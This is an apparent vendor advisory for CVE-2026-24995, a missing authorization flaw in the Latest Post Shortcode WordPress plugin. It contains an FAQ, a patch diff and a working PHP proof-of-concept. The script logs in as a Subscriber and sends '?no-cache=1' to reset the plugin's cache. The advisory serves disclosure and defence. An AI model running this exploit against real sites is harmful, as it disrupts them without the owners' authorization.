What is CVE-2026-24995?

CVE-2026-24995 is a medium-severity vulnerability in the Latest Post Shortcode plugin for WordPress, affecting versions up to and including 14.2.0. It is caused by a missing authorization check that allows authenticated users with Subscriber-level access to perform unauthorized actions, such as resetting the plugin’s cache.

How does this vulnerability work?

The vulnerability exists in the `lps_reset_cache` method, which lacks proper permission checks. Authenticated users can trigger a cache reset by sending a simple HTTP GET request with a `no-cache` parameter, potentially leading to a denial-of-service condition without requiring elevated privileges.

Who is affected by this vulnerability?

Any WordPress site using the Latest Post Shortcode plugin version 14.2.0 or earlier is at risk. This includes sites where authenticated users, even those with low privileges like Subscribers, can access functionalities that should be restricted.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Latest Post Shortcode plugin installed on your WordPress site. If it is version 14.2.0 or earlier, your site is susceptible to this vulnerability and should be updated immediately.

How can I fix this vulnerability?

To mitigate the vulnerability, update the Latest Post Shortcode plugin to version 14.2.1 or later, where the issue has been addressed. The patch includes an authorization check that requires users to have at least Contributor-level access to perform cache resets.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it could still allow unauthorized actions by low-privileged users. Administrators should take it seriously and apply the patch to prevent potential exploitation.

What are the practical risks of this vulnerability?

The immediate risk involves a denial-of-service condition where the plugin’s cache is cleared, leading to degraded performance and potential disruption of site functionality. While it does not directly compromise data or allow remote code execution, it violates the integrity of the site.

What is a proof of concept (PoC) for this vulnerability?

The proof of concept provided demonstrates how an authenticated user can exploit the vulnerability by sending a crafted HTTP GET request. It outlines the steps to authenticate and trigger the cache reset, showcasing the ease of exploitation without requiring elevated privileges.

How can I protect my site from similar vulnerabilities?

To protect against similar vulnerabilities, regularly update all plugins and themes, monitor security advisories, and implement least privilege access controls. Additionally, consider using security plugins that can help detect and mitigate unauthorized access attempts.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Latest Post Shortcode plugin until it can be updated. This will prevent any potential exploitation while you work on applying the necessary patch.

Where can I find more information about CVE-2026-24995?

Further information about CVE-2026-24995 can be found on the National Vulnerability Database (NVD) and security advisory websites. Additionally, the plugin’s official repository may provide updates and discussions related to the vulnerability.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24995: Latest Post Shortcode <= 14.2.0 – Missing Authorization (latest-post-shortcode)

CVE ID CVE-2026-24995

Plugin latest-post-shortcode

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 14.2.0

Patched Version 14.2.1

Disclosed January 23, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24995:
The Latest Post Shortcode WordPress plugin, versions up to and including 14.2.0, contains a missing authorization vulnerability. The plugin’s cache reset functionality lacks a capability check, allowing any authenticated user, including those with the low-privilege Subscriber role, to trigger the action. This flaw violates the principle of least privilege and provides unauthorized access to a plugin administrative function.

Atomic Edge research identifies the root cause in the `lps_reset_cache` method within the main plugin file `latest-post-shortcode.php`. The function at line 904 checks for the presence of a `no-cache` GET parameter but performs no verification of the requesting user’s permissions. The function `execute_lps_cache_reset` is called directly, clearing the plugin’s cached data. The vulnerable code path is accessible via a simple HTTP GET request to any page where the plugin is active, as the method hooks into WordPress’s `wp_loaded` action.

An attacker exploits this vulnerability by sending an authenticated HTTP GET request containing the `no-cache` parameter. The attack vector does not require a specific endpoint; the request can be sent to any front-end or admin page. The payload is the query string `?no-cache=1`. Any authenticated user, regardless of role, can trigger the cache reset, causing a denial-of-service condition for the plugin’s performance features and potentially disrupting site functionality that relies on cached post data.

The patch in version 14.2.1 adds a comprehensive authorization check. The updated `lps_reset_cache` function now validates a nonce (`lps-modal-actions`), confirms the user is logged in, and checks that the user possesses at least the Contributor role. The fix introduces a `verify` GET parameter for the nonce check. The patch also updates the JavaScript localization in `assets.php` to include this nonce, ensuring legitimate admin UI requests remain functional. Before the patch, the function executed unconditionally. After the patch, execution requires a valid nonce and a user role of Contributor, Author, Editor, or Administrator.

Successful exploitation allows low-privileged attackers to perform an administrative action. The immediate impact is a denial-of-service condition where the plugin’s cache is forcibly cleared, potentially degrading site performance. Repeated exploitation could cause resource consumption. While the action does not directly lead to data compromise or code execution, it represents a clear integrity violation where unauthorized users can alter plugin state and affect site behavior.

Differential between vulnerable and patched code

Code Diff

--- a/latest-post-shortcode/incs/assets.php
+++ b/latest-post-shortcode/incs/assets.php
@@ -21,7 +21,26 @@
  * Returns the assets version to be used.
  */
 function ver() {
-	return 'lpsv' . LPS_PLUGIN_VERSION . get_option( 'lps_asset_version', LPS_PLUGIN_VERSION );
+	static $lps_assets_ver;
+
+	if ( ! isset( $lps_assets_ver ) ) {
+		$glob = glob( LPS_PLUGIN_DIR . 'lps-block/build/*.php' );
+		if ( $glob ) {
+			$list = '';
+			foreach ( $glob as $file ) {
+				$assets = require $file;
+				$list  .= $assets['version'] ?? time();
+			}
+
+			$lps_assets_ver = md5( $list );
+		}
+
+		if ( empty( $lps_assets_ver ) ) {
+			$lps_assets_ver = get_option( 'lps_asset_version', LPS_PLUGIN_VERSION );
+		}
+	}
+
+	return 'lpsv' . LPS_PLUGIN_VERSION . $lps_assets_ver;
 }

 /**
@@ -127,17 +146,14 @@
 			ver(),
 			false
 		);
-		wp_localize_script(
-			'lps-admin-shortcode-button',
-			'lpsGenVars',
-			[
-				'ajaxUrl'     => admin_url( 'admin-ajax.php' ),
-				'icon'        => LPS_PLUGIN_URL . 'assets/images/icon-purple.svg',
-				'title'       => esc_html__( 'Latest Post Shortcode', 'lps' ),
-				'outputTypes' => implode( ' ', array_filter( array_keys( $lps::get_card_output_types() ) ) ),
-				'allowIcon'   => $lps::allow_icon_for_roles(),
-			]
-		);
+		wp_localize_script( 'lps-admin-shortcode-button', 'lpsGenVars', [
+			'ajaxUrl'     => admin_url( 'admin-ajax.php' ),
+			'verify'      => wp_create_nonce( 'lps-modal-actions' ),
+			'icon'        => LPS_PLUGIN_URL . 'assets/images/icon-purple.svg',
+			'title'       => esc_html__( 'Latest Post Shortcode', 'lps' ),
+			'outputTypes' => implode( ' ', array_filter( array_keys( $lps::get_card_output_types() ) ) ),
+			'allowIcon'   => $lps::allow_icon_for_roles(),
+		] );
 		wp_enqueue_script( 'lps-admin-shortcode-button' );
 	}
 }
--- a/latest-post-shortcode/incs/parts/tabs5.php
+++ b/latest-post-shortcode/incs/parts/tabs5.php
@@ -279,7 +279,7 @@
 		<div class="row">
 			<label for="lps_color_bg"><?php esc_html_e( 'background', 'lps' ); ?></label>
 			<div class="lps-color-wrapper">
-				<input type="text" name="lps_color_bg" id="lps_color_bg" onchange="lpsRefresh()" onkeyup="lpsRefresh()" placeholder="<?php esc_attr_e( 'inherit', 'lps' ); ?>" size="32">
+				<input type="text" name="lps_color_bg" id="lps_color_bg" onchange="lpsRefresh(); lpsStyleHelper()" onkeyup="lpsRefresh()" placeholder="<?php esc_attr_e( 'inherit', 'lps' ); ?>" size="32">
 				<input type="color" id="lps_color_bg_field" onchange="lpsRefreshColor(this)">
 				<button onclick="lpsResetColor('bg')" onkeyup="lpsResetColor('bg')" aria-label="<?php esc_html_e( 'Reset', 'lps' ); ?>"></button>
 			</div>
--- a/latest-post-shortcode/latest-post-shortcode.php
+++ b/latest-post-shortcode/latest-post-shortcode.php
@@ -5,7 +5,7 @@
  * Description: This plugin allows you to display a dynamic content selection from your posts and pages. This can be embedded as a shortcode, as a Gutenberg block, or as an Elementor widget.
  * Text Domain: lps
  * Domain Path: /langs
- * Version:     14.2.0
+ * Version:     14.2.1
  * Author:      Iulia Cazan
  * Author URI:  https://profiles.wordpress.org/iulia-cazan
  * Donate link: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=JJA37EHZXWUTJ
@@ -13,7 +13,7 @@
  *
  * @package LPS
  *
- * Copyright (C) 2015-2025 Iulia Cazan
+ * Copyright (C) 2015-2026 Iulia Cazan
  *
  * This program is free software; you can redistribute it and/or modify
  * it under the terms of the GNU General Public License, version 2, as
@@ -30,7 +30,7 @@
  */

 // Define the plugin version.
-define( 'LPS_PLUGIN_VERSION', 14.20 );
+define( 'LPS_PLUGIN_VERSION', 14.21 );
 define( 'LPS_PLUGIN_DIR', plugin_dir_path( __FILE__ ) );
 define( 'LPS_PLUGIN_URL', plugin_dir_url( __FILE__ ) );
 define( 'LPS_PLUGIN_SLUG', 'lps' );
@@ -904,8 +904,18 @@
 	public static function lps_reset_cache() {
 		$get = filter_input( INPUT_GET, 'no-cache', FILTER_DEFAULT );
 		if ( ! empty( $get ) ) {
-			self::execute_lps_cache_reset();
-			echo 'OK';
+			$verify = filter_input( INPUT_GET, 'verify', FILTER_DEFAULT );
+			if ( wp_verify_nonce( $verify, 'lps-modal-actions' ) && is_user_logged_in() ) {
+				$user  = wp_get_current_user();
+				$match = array_intersect( [ 'administrator', 'editor', 'author', 'contributor' ], $user->roles ?? [] );
+				if ( ! empty( $match ) ) {
+					self::execute_lps_cache_reset();
+					echo 'OK';
+					die();
+				}
+			}
+
+			echo 'Not OK';
 			die();
 		}
 	}
--- a/latest-post-shortcode/lps-block/build/filters.asset.php
+++ b/latest-post-shortcode/lps-block/build/filters.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '38f599f39c2e558a722f');
+<?php return array('dependencies' => array(), 'version' => '9fadcbd3daf2df607360');
--- a/latest-post-shortcode/lps-block/build/masonry.asset.php
+++ b/latest-post-shortcode/lps-block/build/masonry.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '75ea1044188d601452b5');
+<?php return array('dependencies' => array(), 'version' => 'ba784518f9912439d12b');

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24995 - Latest Post Shortcode <= 14.2.0 - Missing Authorization

<?php

$target_url = 'https://vulnerable-wordpress-site.com/';
$username = 'subscriber';
$password = 'password';

// Step 1: Authenticate to obtain session cookies
$login_url = $target_url . 'wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Get the login page to retrieve the nonce (log in to WordPress)
$response = curl_exec($ch);

// Prepare POST data for authentication
$post_fields = http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . 'wp-admin/',
    'testcookie' => '1'
]);

curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);

// Execute login
$response = curl_exec($ch);

// Step 2: Exploit the missing authorization by triggering cache reset
// The vulnerable parameter 'no-cache' can be sent to any page.
$exploit_url = $target_url . '?no-cache=1';
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_POSTFIELDS, '');

$response = curl_exec($ch);
curl_close($ch);

// Check for successful exploitation
if (trim($response) === 'OK') {
    echo "[+] Cache reset successfully triggered. Vulnerability confirmed.n";
} else {
    echo "[-] Exploit may have failed. Response: " . htmlspecialchars($response) . "n";
}

?>

Frequently Asked Questions

What is CVE-2026-24995?
Understanding the vulnerability
CVE-2026-24995 is a medium-severity vulnerability in the Latest Post Shortcode plugin for WordPress, affecting versions up to and including 14.2.0. It is caused by a missing authorization check that allows authenticated users with Subscriber-level access to perform unauthorized actions, such as resetting the plugin’s cache.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability exists in the `lps_reset_cache` method, which lacks proper permission checks. Authenticated users can trigger a cache reset by sending a simple HTTP GET request with a `no-cache` parameter, potentially leading to a denial-of-service condition without requiring elevated privileges.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Latest Post Shortcode plugin version 14.2.0 or earlier is at risk. This includes sites where authenticated users, even those with low privileges like Subscribers, can access functionalities that should be restricted.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the Latest Post Shortcode plugin installed on your WordPress site. If it is version 14.2.0 or earlier, your site is susceptible to this vulnerability and should be updated immediately.
How can I fix this vulnerability?
Applying the patch
To mitigate the vulnerability, update the Latest Post Shortcode plugin to version 14.2.1 or later, where the issue has been addressed. The patch includes an authorization check that requires users to have at least Contributor-level access to perform cache resets.
What does the CVSS score of 4.3 indicate?
Understanding severity ratings
A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it could still allow unauthorized actions by low-privileged users. Administrators should take it seriously and apply the patch to prevent potential exploitation.
What are the practical risks of this vulnerability?
Potential impacts on site functionality
The immediate risk involves a denial-of-service condition where the plugin’s cache is cleared, leading to degraded performance and potential disruption of site functionality. While it does not directly compromise data or allow remote code execution, it violates the integrity of the site.
What is a proof of concept (PoC) for this vulnerability?
Demonstrating the exploit
The proof of concept provided demonstrates how an authenticated user can exploit the vulnerability by sending a crafted HTTP GET request. It outlines the steps to authenticate and trigger the cache reset, showcasing the ease of exploitation without requiring elevated privileges.
How can I protect my site from similar vulnerabilities?
Best practices for WordPress security
To protect against similar vulnerabilities, regularly update all plugins and themes, monitor security advisories, and implement least privilege access controls. Additionally, consider using security plugins that can help detect and mitigate unauthorized access attempts.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Latest Post Shortcode plugin until it can be updated. This will prevent any potential exploitation while you work on applying the necessary patch.
Where can I find more information about CVE-2026-24995?
Resources for further reading
Further information about CVE-2026-24995 can be found on the National Vulnerability Database (NVD) and security advisory websites. Additionally, the plugin’s official repository may provide updates and discussions related to the vulnerability.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations